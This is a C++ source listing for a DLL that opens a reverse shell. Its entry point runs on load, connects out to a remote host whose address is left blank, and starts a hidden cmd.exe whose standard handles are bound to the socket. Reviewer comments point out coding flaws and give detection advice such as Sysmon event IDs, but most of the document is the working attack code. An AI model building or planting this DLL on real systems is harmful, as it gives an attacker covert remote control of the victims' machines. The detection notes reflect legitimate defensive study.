A custom cpp reverse shell dll
-----------------------------------------------------------shell.h----------------------------------------------------------- | |
// Declaration of shell(); the definition is in the shell.cpp section below
// and the only caller in this listing is DllMain in pwn.cpp.
void shell(); | |
-----------------------------------------------------------pwn.cpp----------------------------------------------------------- | |
#include <Windows.h> | |
#include "shell.h" | |
// DLL entry point. The loader calls it with fwdReason describing the event;
// on DLL_PROCESS_ATTACH (the DLL being mapped into a process) it calls
// shell(), so the payload runs as a side effect of the load itself and no
// exported function has to be invoked.
//
// NOTE(review): there is no `break` after shell(), so control falls through
// into the DLL_PROCESS_DETACH case, whose only statement is `break`. The
// function also has no return statement although it is declared BOOL.
// NOTE(review): shell() waits with INFINITE on the child process, so this
// call does not return to the loader until that process exits.
//
// Defender view: any process that loads this image executes the payload at
// load time. Relevant controls are application-control rules that cover DLLs,
// and image-load telemetry (e.g. Sysmon Event ID 7) for unsigned modules
// loaded from user-writable paths.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fwdReason, LPVOID lpReserved){ | |
switch(fwdReason){ | |
case DLL_PROCESS_ATTACH: | |
shell(); | |
case DLL_PROCESS_DETACH: | |
break; | |
} | |
} | |
-----------------------------------------------------------shell.cpp----------------------------------------------------------- | |
#include <stdio.h> | |
#include <string.h> | |
#include <process.h> | |
#include <winsock2.h> | |
#include <ws2tcpip.h> | |
#pragma comment(lib, "Ws2_32.lib") | |
// Remote host and port handed to getaddrinfo() in shell(). Both are empty
// strings in this listing -- presumably left blank by the author to be filled
// in before building.
#define REMOTE_ADDR "" | |
#define REMOTE_PORT "" | |
// Opens an outbound TCP connection to REMOTE_ADDR:REMOTE_PORT and starts
// cmd.exe with its stdin, stdout and stderr all set to that socket, then
// blocks until cmd.exe exits. Takes no arguments and returns nothing; none of
// the API return values below are checked.
//
// Defender view: what this leaves behind is an outbound TCP connection from
// the process that loaded the DLL, followed by that process creating a
// cmd.exe child with a hidden window and inherited handles. Process-creation
// and network-connection telemetry (e.g. Sysmon Event IDs 1 and 3) correlated
// on the parent process captures both halves; a cmd.exe whose standard
// handles are sockets rather than console or pipe handles is a strong signal.
void shell() | |
{ | |
// Detach the calling process from its console.
FreeConsole(); | |
WSADATA wsaData; | |
// Request Winsock 2.2. iResult is assigned but never read afterwards.
int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); | |
struct addrinfo *result = NULL, *ptr = NULL, hints; | |
memset(&hints, 0, sizeof(hints)); | |
// Any address family, TCP stream socket.
hints.ai_family = AF_UNSPEC; | |
hints.ai_socktype = SOCK_STREAM; | |
hints.ai_protocol = IPPROTO_TCP; | |
// NOTE(review): the return value is ignored; if resolution fails, result
// stays NULL and the ptr-> dereferences below act on a null pointer.
// result is also never released with freeaddrinfo().
getaddrinfo(REMOTE_ADDR, REMOTE_PORT, &hints, &result); | |
// Only the first entry of the returned list is used.
ptr = result; | |
// Last three arguments (protocol info, group, flags) are passed as NULL.
SOCKET ConnectSocket = WSASocket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol, NULL, NULL, NULL); | |
// Outbound connect; the result is not checked.
connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen); | |
STARTUPINFO si; | |
PROCESS_INFORMATION pi; | |
ZeroMemory(&si, sizeof(si)); | |
si.cb = sizeof(si); | |
ZeroMemory(&pi, sizeof(pi)); | |
// Use the std handles supplied below and honour wShowWindow (SW_HIDE).
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; | |
si.wShowWindow = SW_HIDE; | |
// All three standard handles of the child are the connected socket.
si.hStdInput = (HANDLE)ConnectSocket; | |
si.hStdOutput = (HANDLE)ConnectSocket; | |
si.hStdError = (HANDLE)ConnectSocket; | |
// Hard-coded absolute path to the command interpreter.
TCHAR cmd[] = TEXT("C:\\WINDOWS\\SYSTEM32\\CMD.EXE"); | |
// bInheritHandles is TRUE, so the child inherits the caller's inheritable handles.
CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi); | |
// Blocks the calling thread until the child exits. In this listing the
// caller is DllMain, so the wait happens inside the DLL entry point.
WaitForSingleObject(pi.hProcess, INFINITE); | |
CloseHandle(pi.hProcess); | |
CloseHandle(pi.hThread); | |
// NOTE(review): ConnectSocket is never passed to closesocket() before cleanup.
WSACleanup(); | |
} |